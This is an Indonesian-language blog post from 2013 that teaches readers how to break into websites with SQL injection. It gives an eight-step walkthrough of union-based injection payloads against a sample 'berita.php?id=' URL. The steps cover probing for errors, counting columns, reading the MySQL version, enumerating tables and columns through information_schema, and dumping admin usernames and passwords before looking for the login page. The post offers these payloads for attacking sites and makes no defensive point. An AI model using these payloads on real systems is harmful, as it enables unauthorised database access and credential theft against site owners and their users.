Loading...

Jumat, 26 Juli 2013

Cara Hacking Website dengan Teknik SQL Injection

Pagi semua temen-temen di dumay!!!semga di pagi hari ini kita di beri kesehatan untuk selalu bisa beraktifitas seperti biasanya.amin!!!oke..di pagi hari ini saya akan membahas dan mempostingkan bagaimana cara membobol/Hacking Website dengan Teknik SQL Injection. Sebelum kita membahas masalah ini mari kita mengenal apa itu SQL Injection,apa difinisinya dan apa kegunaannya!!!SQL Injection Sering digunakan untuk menjebol atau merusak database suatu website atau blog.

Pengertian Dari SQL Injection Atau Injeksi SQL - Injeksi SQL atau SQL Injection (Dalam bahasa inggris) adalah sebuah teknik dimana dengan menggunakan/menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi/web server. Celah ini terjadi ketika login/masukan pengguna.
Tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah suatu contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip(Script) diimbuhkan/dimasukan di dalam bahasa yang lain.
(Source Wikipedia)
SQL Injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang/attacker bisa mendapatkan akses ke basis data di dalam sistem(Sistem Utama). SQL injection yaitu serangan yang mirip dengan serangan XSS dalam arti bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.
SQL Injection atau Injeksi SQL exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input.
(de-kill.blogspot.com)
Lebih singkatnya
 SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.
 oke sekarang teman-teman dumay udah paham dan mengerti apa itu SQL Injection ada apa kegunaannya.sekarang kita beralih ke topik pembahasan sebelumnya yaitu mengenaik Bagaimana cara Hacking Website dengan Teknik SQL Injaction Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
Carilah target
Misal: site:/berita.php?id=1

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
site:/berita.php?id=1' atau
site:/berita.php?id=-1

[ Step 2 ]
Mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah: order by

Contoh:

site:/berita.php?id=-1+order+by+1-- atau
site:/berita.php?id=-1+order+by+1/*

teliti secara step by step (satupersatu)...
Misal:

site:/berita.php?id=-1+order+by+1--
site:/berita.php?id=-1+order+by+2--
site:/berita.php?id=-1+order+by+3--
site:/berita.php?id=-1+order+by+4--

Sehingga muncul error atau hilang pesan error...
Misal: site:berita.php?id=-1+order+by+9--

Berarti yang kita ambil adalah sampai angka 8
Menjadi site:/berita.php?id=-1+order+by+8--
[ Step 3 ]
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: site:/berita.php?id=-1+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: site:/berita.php?id=-1+union+select+1,2,3,4,version(),6,7,8-- atau
site:/berita.php?id=-1+union+select+1,2,3,4,@@version,6,7,8--

Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
Untuk menampilkan table yang ada pada web tersebut adalah
perintah table_name >>> dimasukan pada angka yangg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

site:/berita.php?id=-1+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ?tables+where+table_schema=database()--
[ Step 6 ]
Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
Website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--
[ Step 7 ]
Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

site:/berita.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

Contoh kata yang keluar adalah id,username,password

Contoh : site:/berita.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

[ Step 8 ]

Tahap terakhir mencari halaman admin atau login.


  sampai pada tahap terakahir ini pembahasan tentang Sql Injaction,mungkin bila temen-temen kurang begitu jelas silahkan belajar sendiri atau silahkan mencari buku/browser tentang sql injection ini. kita sama-sama belajar bila ada kesalahan dalam tulisan dan cara pembahasaan maka saya minta maaf dan semoga pembahasan ini bermanfaat buat saya dan temen-temen di dumay smuanya!!!amiiii.....



By@Si OTAK MATI

0 komentar:

Posting Komentar

Thankz For Your Koment

 
Design by Free NATTA Themes | Powerted by NATTA - Premium WordPress Themes | SiotakMati Corpuration